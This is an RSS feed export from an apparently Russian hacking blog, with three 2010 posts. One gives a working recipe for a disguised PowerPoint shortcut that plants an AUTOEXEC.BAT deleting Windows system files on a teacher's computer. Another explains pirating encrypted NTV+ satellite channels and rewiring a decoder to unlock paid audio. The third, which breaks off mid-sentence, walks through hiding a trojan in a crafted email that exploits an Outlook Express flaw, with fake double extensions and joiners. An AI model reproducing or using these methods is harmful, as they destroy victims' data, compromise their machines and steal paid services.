<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Как разблокировать аккаунт &#187; Хакерство</title>
	<atom:link href="http://suspended.ru/tag/%d1%85%d0%b0%d0%ba%d0%b8%d0%bd%d0%b3/feed/" rel="self" type="application/rss+xml" />
	<link>http://suspended.ru</link>
	<description>Как разблокировать аккаунты, защитить компьютер и стать хакером</description>
	<lastBuildDate>Thu, 23 Dec 2021 13:52:45 +0000</lastBuildDate>
	<language>ru-RU</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=3.9.27</generator>
	<item>
		<title>Вирус в bat файле для класухи ;)</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-259/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-259/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=567</guid>
		<description><![CDATA[Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: &#171;а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?&#187;. Я нашел ответ. Он находится в bat файлах. План был таков: СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ: Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet266.jpg" alt="интернет" />Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: &#171;а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?&#187;. Я нашел ответ. Он находится в bat файлах.<br />
План был таков:<br />
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:<br />
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем&#8230; Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации.<span id="more-567"></span> Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!<br />
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).<br />
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем&#8230; Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах &#171;Свойства папки>Вид&#187; стоит галочка на &#171;Скрывать расширения для зарегистрированных типов файлов&#187;. На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.<br />
Файл runner_copier.bat совершает следующие действия:<br />
-открывает файл pres.ppt с самой презентацией, которую йа должен показать<br />
-копирует заранее написанный файл AUTOEXEC.BAT в C:.<br />
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.<br />
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:<br />
goto %config%<br />
:dos1<br />
rem c:vc401vc<br />
lh keyrus<br />
lh mmouse<br />
lh C:WINDOWSCOMMANDmscdex /d:12345678<br />
lh dndn<br />
bootgui=0<br />
:dos2<br />
rem essolo.com<br />
lh keyrus<br />
lh mmouse<br />
lh dndn<br />
bootgui=0<br />
:win<br />
rem c:essolo.com<br />
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn<br />
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*<br />
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)<br />
mode con codepage select=866<br />
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys<br />
goto continue<br />
:meos<br />
c:kolibrimeosload.com<br />
:l:meosload.com<br />
:continue<br />
rem bootgui=1<br />
Но я его немного подправил. Я всего лишь добавил в конец следующие строки:<br />
cd<br />
cd windows<br />
del *.dll<br />
del *.ini<br />
cd system32<br />
del *.dll<br />
del *.exe<br />
и все!<br />
Действие самого вируса происходит следующим образом:<br />
1)запускаеца файл Презентация.ppt.lnk<br />
2)он ссылаеца на файл runner_copier.bat<br />
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.<br />
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.<br />
5) комп выключается<br />
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.<br />
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.<br />
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.<br />
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.<br />
end.<br />
Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:<br />
-малый размер<br />
-незаметность<br />
-неизвестность антивирям<br />
-большие масштабы действия<br />
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).<br />
В остальном полная свобода.<br />
Удачи в написании вирусов, товарищи!</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-259/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>НТВ+ бесплатно</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-258/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-258/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=566</guid>
		<description><![CDATA[Как смотреть НТВ+ и другие каналы Как смотреть НТВ+ и другие каналы, кодированные в системе Nagravision-Syster, если нет возможности смотреть их официально?Ответы на наиболее часто задаваемые вопросы на основе собственных наработок. Этот FAQ предназначен для тех, кто увлекается спутниковым телевидением, компьютерами, кто любит экспериментировать, не боится неудач. Внимание! Информация только для образовательных целей. Коммерческое использование [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet265.jpg" alt="интернет" />Как смотреть НТВ+ и другие каналы<br />
Как смотреть НТВ+ и другие каналы, кодированные в системе Nagravision-Syster, если нет возможности смотреть их официально?Ответы на наиболее часто задаваемые вопросы на основе собственных наработок.<br />
Этот FAQ предназначен для тех, кто увлекается спутниковым телевидением, компьютерами, кто любит экспериментировать, не боится неудач.<br />
Внимание! Информация только для образовательных целей.<br />
Коммерческое использование преследуется по закону.<span id="more-566"></span><br />
Вопрос первый, самый глупый, но вдруг кто-то не знает? Что такое НТВ+ и какие проблемы с его просмотром?<br />
Какие способы пиратского просмотра каналов кодированных Nagravision-Syster вообще существуют?<br />
Что такое PC-TV и какие телеканалы можно смотреть используя его?<br />
Что для этого надо ?<br />
Какая карта видео-захвата для этого нужна?<br />
Какой программой лучше пользоваться?<br />
Как и что правильно подключить?<br />
Как правильно настроить программу?<br />
Как открыть звук?<br />
Как вывести изображение на телевизор?<br />
Как часто телекомпании меняют коды?<br />
Можно ли обойтись без компьютера?<br />
Спутниковое телевидение существует как бесплатное, так и коммерческое, для просмотра которого надо платить телекомпании абонентскую плату. Для того чтобы обеспечить сбор абонентской платы, телекомпании кодируют свой сигнал, то есть делают не возможным просмотр его без специального декодера. Телекомпания НТВ+ использует Французскую систему кодирования Nagravision-Syster,в которой используется перемешивание строк по особому алгоритму, в соответствии с таблицей перестановки строк. На рисунке видно, как выглядит изображение, если его попытаться смотреть без декодера. Кроме того, применяется инверсия спектра звукового сопровождения частой 12,8 кГц, что очень сильно искажает звук, делая не возможным его прослушивание. Вдобавок ко всему, для разграничения доступа оплативших и не оплативших подписку абонентов, применяется система адресного кодирования &#8212; то есть телекомпания имеет возможность сигналом со спутника избирательно выключать декодеры не оплативших абонентов. Достигается это тем, что у подписчиков имеются индивидуальные ключи, представляющие собой микросхему памяти, в которой содержится индивидуальный код, а так же обновляемая через спутник информация о состоянии подписки. Эту же систему кодирования применяют телекомпании Германии, Франции, Польши, а так же ряда других стран. Существуют и другие системы кодирования, такие как D2MAC, Videocript, и т.д. но в этой статье мы их описывать не будем. Не смотря на то, что этой системе уже более десяти лет, протокол обмена данными между ключом и декодером телевизионными пиратами изучен мало (наверно просто это было ни кому не нужно), о работающих эмуляторах ключей пока не слышно.<br />
Система кодирования Nagravision-Syster была взломана другим способом &#8212; появились пиратские декодеры, которые работают безо всяких ключей на принципе подбора кода пут|м сравнения и поиска похожих строк. Такие декодеры открывают все каналы, на которые они рассчитаны и совершенно бесплатно. К сожалению, купить такой декодер у нас пока не возможно, а сделать тоже очень сложно в основном из-за отсутствия необходимой информации.<br />
Но недавно появилась возможность смотреть НТВ+ и другие каналы кодированные в Nagravision-Syster с помощью персонального компьютера, используя тот же принцип, что и у пиратского декодера, но реализуя его с помощью специальной программы. Этот способ получил общее название PC-TV. PC-TV позволяет смотреть все каналы, кодированные в Nagravision (смотри таблицу).<br />
Что нужно для просмотра кодированных каналов таким способом?<br />
Во-первых, нужен настроенный комплект спутникового телевидения, состоящий как минимум из антенны (тарелки), конвертера и ресивера. Эта система должна обеспечивать уверенный при|м тех кодированных каналов, которые вы хотите смотреть. Для случая с НТВ+ достаточно иметь родной &#171;НТВшный&#187; комплект с &#171;тарелкой&#187; того диаметра, который достаточен для при|ма сигнала в вашей местности, можно без оригинального декодера.<br />
Во вторых, нужен достаточно мощный IBM совместимый персональный компьютер, минимум &#8212; P-166MMX, 32Mb RAM, видеоадаптер PCI 4Mb, желательно P-II с как можно большей тактовой частотой и оперативной памятью 64Mb. Объ|м и скорость ж|сткого диска, а так же другие параметры, существенно не влияют.<br />
В третьих, для ввода изображения в компьютер, нужна карта видеовхода, построенная на одном из следующих чипов &#8212; BT848, BT849, BT878, BT879. Сейчас таких карт выпускается достаточно много, разными фирмами, под разными названиями, на пример: MiroPCTV, AverMedia различных модефикаций, Fly Video(наверно самый дешевый вариант), MR Vision TV Link, ТЕЛЕМАСТЕР. Продолжать список можно ещ|, но нет смысла &#8212; подойд|т любая карта, лишь бы она была сделана на чипе серии BT8XX. Карты отличаются друг от друга наличием и качеством встроенного TV тюнера для просмотра обычных эфирных телеканалов, наличием дистанционного управления тюнером, количеством видеовходов -1 или 2, качеством и удобством прилагаемого к ней софта и некоторыми другими наворотами, которые ни каким образом не связаны с нашей задачей, так как в данном случае требуется только видеовход. В последнее время стали появляться версии программ для видеоадаптеров на чипе ATI c видеовходом (без BT8XX), но так как у меня такой карты нет, то я их не тестировал и ничего про них сказать не могу.<br />
На сегодняшний день написано несколько программ &#8212; декодеров, которые совершенствовались их авторами (и не только авторами, потому, что почти все они публиковались вместе с исходными текстами) и имеют каждая по несколько версий. У каждой программы есть свои достоинства и недостатки, и стоит попробовать их все, чтобы сделать для себя выбор. Лично мне более других понравилась MoreTV 3.10 &#8212; на мой взгляд, это наиболее удачная программа, которая позволяет смотреть каналы как в стандарте PAL, так и SECAM (НТВ+). У не| реализовано автоматическое включение-выключение декодирования при переходе от кодированных к не кодированным каналам, прямое взаимодействие с картой видео-ввода (достаточно установить драйвер карты, софт можно не ставить, программа сама настраивает карту), имеются удобные оперативные регулировки с помощью горячих клавиш, достаточно легка в настройке. К недостаткам данной программы можно отнести не очень хорошую чистоту цвета в режиме SECAM (хотя у некоторых других программ при просмотре SECAM цвет вообще отсутствует), и интерфейс на немецком языке. Надо учесть, что для видеоадаптеров с видеовходом на чипе ATI, должна быть специальная версия программы- MoreATI-TV.<br />
После того как вы установили карту видеовхода в ваш компьютер, надо соединить НЧ-вход карты с НЧ-выходом вашего ресивера с помощью специального низкочастотного кабеля, такого же, каким вы подключаете телевизор к ресиверу или видеомагнитофону. Установите драйвер и программное обеспечение карты, руководствуясь инструкцией прилагаемой к ней. В результате, если вы сделали вс| правильно, то при включенном ресивере и запущенной программе от карты, вы должны получить на экране компьютера устойчивое изображение того канала, на который настроен в данный момент ваш ресивер, в том виде, в каком оно переда|тся со спутника (т.е. если канал кодированный, то изображение будет напоминать фотографию). Не забудьте, что декодер в настройках ресивера должен быть выключен.<br />
Теперь можно приступить к установке и настройке программы &#8212; декодера. Программы в основном не требуют инсталляции и достаточно просто распаковать архив в любую директорию, желательно в корневом каталоге вашего жесткого диска. В дальнейшем речь пойд|т о настройках программы MoreTV 3.10 &#8212; если вы е| сумеете запустить, то и с остальными программами вы сумеете разобраться сами. Первым делом скопируйте в каталог с программой файл Key.txt предназначенный для НТВ+, если вы настроили ресивер для его при|ма. Учтите, что Key.txt для НТВ+ и для других каналов разные! Не забудьте переименовать файл Key2.txt (извлеченный из архива) в Key.txt (без цифры) и запустите программу.<br />
На экране появится окно настроек программы. В рамке &#171;Video&#187; установите для начала разрешение 640х480YUY2 и поставьте флажок SECAM. В рамке &#171;Hardware&#187; выберите из списка вашу карту (если е| нет в списке, сильно не расстраивайтесь, выберите любую другую, лишь бы на таком же чипе как у вас) марку тюнера можно не устанавливать &#8212; он нужен только при при|ме кодированных каналов с эфирной антенны, PLL для начала лучше не включать. В рамке &#171;Dekodierung&#187; установите количество тестовых строк равным 30 и сохраните настройки (средняя кнопка). Теперь можно запускать собственно программу (верхняя кнопка). Первый запуск программы может продлиться несколько дольше чем обычно (в это время программа созда|т в сво|м каталоге индексный файл с именем MoreTV_XX.idx, где ХХ &#8212; количество тестовых строк), в дальнейшем программа будет запускаться практически мгновенно. Вы должны увидеть на экране декодированное изображение. Если экран останется синим, проверьте все соединения, а если у вашей карты два входа, попробуйте подать сигнал на другой вход. Если изображение есть, но не декодированное, проверьте тот ли Key.txt вы используете (если открыть его блокнотом, он должен начинаться так : 0 1 2 3 4 5 6 7 2 5 4 7 8 9 10 11 14 17 16 19 22 25). Если вс| заработало, попробуйте поэкспериментировать с настройками программы для достижения лучшего качества изображения.<br />
&#171;Горячие клавиши&#187; программы:<br />
Esc &#8212; стоп кадр, F1 &#8212; восстановление после стоп кадра, F2 &#8212; включение декодера (включен / выключен / авто), F3 &#8212; F8 &#8212; изменение формата и размера декодируемого изображения, F10 &#8212; выход из программы, F11 &#8212; Турбо / стандартный декодер, F12 &#8212; синхронизация по фазе, Insert &#8212; контрастность + , Delet &#8212; контрастность &#8212; , Home &#8212; насыщенность + , End &#8212; насыщенность &#8212; , PgUp &#8212; яркость + , PgDn &#8212; яркость -, остальные клавиши предназначены для настройки и переключения каналов встроенного TV тюнера, и для нас значения не имеют.<br />
Программа MoreTV не имеет встроенного декодера звука, и поэтому декодирование звука &#8212; тема отдельного разговора. На сегодняшний день есть три способа прослушивания звукового сопровождения. Способ первый, самый простой, и самый худший. Скачайте одну из программ &#8212; аудио-декодеров (лично мне больше нравится DCPlus), соедините выход звука ресивера с линейным входом звуковой карты вашего компьютера, в настройках стандартного регулятора громкости Windows включите линейный вход на запись, и обязательно выключите на воспроизведении (чтобы предотвратить проникновение кодированного звука непосредственно со входа на выход без обработки программой). Запустите программу с установками по умолчанию, и звук должен заработать. Качество звука регулируется настройками программы. Не забудьте, что для этого ваша звуковая карта обязательно должна поддерживать Full Duplex &#8212; то есть одновременную запись и воспроизведение звука, и эта опция должна быть активизирована в настройках звуковой карты (установить флажок &#171;разрешить двунаправленную работу&#187;). Кроме того, одновременная работа программ аудио и видео декодеров возможна только на достаточно быстрых машинах, а если конфигурация вашего компьютера соответствует только минимальным требованиям, то этот способ для вас непригоден (в зависимости от используемой программы и е| настройки будет &#171;заикаться&#187; звук, либо срываться картинка). Второй способ подойдет тем, у кого есть оригинальный декодер с неоплаченным ключом и кто не боится держать в руках паяльник. Аккуратно вскройте декодер, найдите микросхему с надписью EURO@DEC 5096 ELEXC7397A. Отпаяйте сопротивление от седьмой ноги микросхемы и подайте на эту ногу микросхемы логическую единицу (+5В) через сопротивление1-10к (найдите напряжение +5В с помощью тестера по цепям питания). Соблюдайте осторожность, так как на плате декодера присутствует высокое напряжение!!! Ошибка в ваших действиях может привести к серьезной поломке декодера!!! После этой переделки декодер открывает звук и без оплаты. Третий способ годится для опытных радиолюбителей. Соберите самодельный декодер по привед|нной схеме. Этот способ наиболее сложен, но наверно самый лучший, так как не требует наличия оригинального декодера, не занимает ресурсы компьютера, звук не запаздывает по отношению к видео как в программных декодерах.<br />
После того, как у вас все| получилось, возможно вам захочется вывести изображение на телевизор. Для этого ваш видеоадаптер должен иметь TV-OUT. Практически все современные модели видеоадаптеров имеют модификации с выходом на телевизор. Это видеоадаптеры на таких чипах как: RIVA TNT, RIVA 128, ATI, INTEL 740, S3 VIRGE GX2, а так же некоторые другие. Телевизор подключается к выходу видеоадаптера (чаще всего это обычный &#171;тюльпан&#187;) кабелем, аналогичным тому, которым вы подавали сигнал на вход карты видеовхода. Настраивается адаптер в соответствии с руководством пользователя, прилагаемого к нему. Надо заметить, что практически все видеоадаптеры &#171;усекают&#187; или &#171;поджимают&#187; изображение по вертикали примерно на 5-10%. Это связано с несоответствием количества строк в телевизионном стандарте и изображении формируемом видеоадаптером. Существуют специальные дополнительные карты-TV OUT которые преобразуют стандартное SVGA изображение, формируемое любым видеоадаптером в полноценный сигнал формата PAL, но я встречал о них информацию только в интернете, и пока не разу не видел их в продаже.<br />
Часто задают вопрос &#8212; часто ли телекомпании меняют код, и отличается ли он на разных каналах одного пакета программ? Здесь можно пояснить, что программные декодеры не требуют никаких кодов, они их подбирают &#171;на ходу&#187; методом сравнения соседних строк. В алгоритме декодирования используется только таблица перестановки строк (файл Key.txt) одна для всех каналов НТВ+. В оригинальных декодерах эта таблица содержится в программе-прошивке центрального процессора, т.е. программируется однократно при изготовлении декодера. Соответственно сменить эту таблицу можно, только заменив все декодеры у официальных подписчиков (именно декодеры, а не ключи), что в наших условиях практически не реально.<br />
Иногда задают вопрос &#8212; можно ли все-таки сделать аппаратный декодер, то есть обойтись без компьютера? В принципе это возможно, на сайте www.eurosat.com/salp описан декодер, декодирующий все французские каналы. Так как PC TV с ключом Key.txt подходящим для НТВ+ открывает французские каналы, логично предположить, что данный аппаратный декодер будет открывать и НТВ+, однако я не знаю случаев, чтобы это кто-то проверил на практике. Изготовление данного декодера технологически сложно и может обойтись не в одну сотню долларов, а так же нет никакой гарантии в успехе этого предприятия и поэтому на сегодняшний день наиболее простым способом просмотра каналов кодированных в Nagravision является PC TV.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-258/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Эффективный способ впаривания троянов</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-261/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-261/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=569</guid>
		<description><![CDATA[конецформыначалоформыСразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet268.jpg" alt="интернет" />конецформыначалоформыСразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже разжевать:) так чтоб любой более менее начинающий юзверь мог во всё врубится.<span id="more-569"></span> И так что для этого понадобится:<br />
* The Bat! – один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик , ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты , а его впарят тебе, причём без твоего согласия).<br />
* Zender – спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с http://www.hack-it.by.ru/soft), о ней чуть ниже и поподробнее.<br />
* Троян &#8212; в принципе любой, желательно чтоб не палящийся был.<br />
* Ну и ещё какой нить joiner, их сейчас много развелось так что сами выбирайте, и желательно чтоб он умел менять иконки и закрывать анитивирусы и фаирволы ( и всего то….J).<br />
И так способ этот рулит в Windows 95-98SE (без заплаток) и если установлен основной почтовый клиент это их же OutlookExpress 5.0, они сейчас пока наиболее распространены и в основном большинство народа юзает их….. да да WindowsХреновоРаботает ещё мало кто поставил…. Так что шансы нарваться на таких у вас большие (небось сами на этом софте то сидите ;-). И так как вы раньше рассылали ламерам трояна, брали просто атачили к письму файл с троянам, писали какой нить текст в письме чтоб жертве захотелось открыть его, рассылали по спам листам и надеялись на то что найдётся жертва которая окажется полным ламерьём и откроет приатаченный файл и вот ты уже летишь по халявному инету или форматируешь ламеру диск <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  ( а может и идёшь по тёмному коридору заложив руки за спину в сопровождении дяденьки с отдела «Рэ» <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  , но щас народ уже в основном учёный пошёл и просто так файлы пришедшие почтой не открывает, а для начала бережно сохраняет на диск и потом с упоением насилует их всякими там АВП , Докторами Вьебами и Нортонами, а потом уже думает открывать его или нет. Ну…..нам это надо . Какой шанс что кто то откроет и запустит к себе твою коняшку…..правильно шанс просто мизерный. Поэтому то нам надо сделать так чтоб файл в письме запустился автоматически как только жертва получит это письмо ….. ну …хорошо же чтоб так было… и не надо ни кого уговаривать ( ещё раз подчеркну что рулит всё в Win9x и OE 5.0 ). И так для начала создаём файл mail.eml , затем открываем его в любом текстовом редакторе (желательно в WordPad) и вставляем в него такую вот запись:<br />
From: SuperMegaXaker<br />
To:<br />
Subject: !!!!!Poluchai gad troyana!!!!<br />
MIME-Version: 1.0<br />
Content-Type: multipart/related;<br />
type=&#187;multipart/alternative&#187;;<br />
boundary=&#187;====_ABC1234567890DEF_====&#187;<br />
X-Priority: 3<br />
X-MSMail-Priority: Normal<br />
X-Unsent: 1</p>
<p>&#8212;====_ABC1234567890DEF_====<br />
Content-Type: multipart/alternative;<br />
boundary=&#187;====_ABC0987654321DEF_====&#187;</p>
<p>&#8212;====_ABC0987654321DEF_====<br />
Content-Type: text/html;<br />
charset=&#187;iso-8859-1&#8243;<br />
Content-Transfer-Encoding: quoted-printable</p>
<p>&#8212;====_ABC0987654321DEF_====&#8212;</p>
<p>&#8212;====_ABC1234567890DEF_====<br />
Content-Type: audio/x-wav;<br />
name=&#187;Troyan.jpg.exe”<br />
Content-Transfer-Encoding: base64<br />
Content-ID:</p>
<p>На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста )</p>
<p>&#8212;====_ABC1234567890DEF_====</p>
<p>&#8212;====_ABC1234567890DEF_====&#8212;</p>
<p>Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:<br />
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAgAAAAA<br />
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC<br />
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB<br />
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED<br />
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA<br />
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA<br />
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA<br />
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA<br />
AAAAAAAAAAAAAAAAAAААА</p>
<p>Это и есть сам файл трояна , просто он в кодировке base-64. Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку…. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету. И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить , не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ :). Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:<br />
На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста)<br />
Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то , но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять. Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From , To и Subject на нужные вам, и ещё поменяйте в строке Name=&#187;имя_трояна.exe&#187; на что нибудь другое типа name=&#187;my_sexy_foto.jpg.exe&#187;. То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла , которое получит жертва. Кстати нам так же пригодится и Joiner , склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело. Да, ещё за место расширения файла .exe можно поставаить .scr – это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe , просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком 